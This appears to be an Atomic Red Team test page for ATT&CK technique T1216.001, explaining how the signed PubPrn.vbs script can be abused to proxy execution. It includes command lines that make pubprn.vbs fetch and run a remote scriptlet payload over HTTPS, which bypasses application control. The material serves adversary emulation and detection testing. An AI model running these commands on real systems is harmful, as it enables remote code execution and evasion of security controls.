T1216.001
Signed Script Proxy Execution: Pubprn
Description from ATT&CK
Adversaries may use PubPrn to proxy execution of malicious remote files. PubPrn.vbs is a Visual Basic script that publishes a printer to Active Directory Domain Services. The script may be signed by Microsoft and is commonly executed through the Windows Command Shell via
Cscript.exe. For example, the following code publishes a printer within the specified domain:cscript pubprn Printer1 LDAP://CN=Container1,DC=Domain1,DC=Com.(Citation: pubprn)Adversaries may abuse PubPrn to execute malicious payloads hosted on remote sites.(Citation: Enigma0x3 PubPrn Bypass) To do so, adversaries may set the second
script:parameter to reference a scriptlet file (.sct) hosted on a remote site. An example command ispubprn.vbs 127.0.0.1 script:https://mydomain.com/folder/file.sct. This behavior may bypass signature validation restrictions and application control solutions that do not account for abuse of this script.In later versions of Windows (10+),
PubPrn.vbshas been updated to prevent proxying execution from a remote site. This is done by limiting the protocol specified in the second parameter toLDAP://, vice thescript:moniker which could be used to reference remote code via HTTP(S).
Atomic Tests
Atomic Test #1: PubPrn.vbs Signed Script Bypass
Executes the signed PubPrn.vbs script with options to download and execute an arbitrary payload.
Supported Platforms: Windows
auto_generated_guid: 9dd29a1f-1e16-4862-be83-913b10a88f6c
Inputs
| Name | Description | Type | Default Value |
|---|---|---|---|
| remote_payload | A remote payload to execute using PubPrn.vbs. | url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1216.001/src/T1216.001.sct |
Attack Commands: Run with command_prompt!
cscript.exe /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs localhost "script:#{remote_payload}"Atomic test(s) for this technique last updated: 2023-02-13 23:10:37 UTC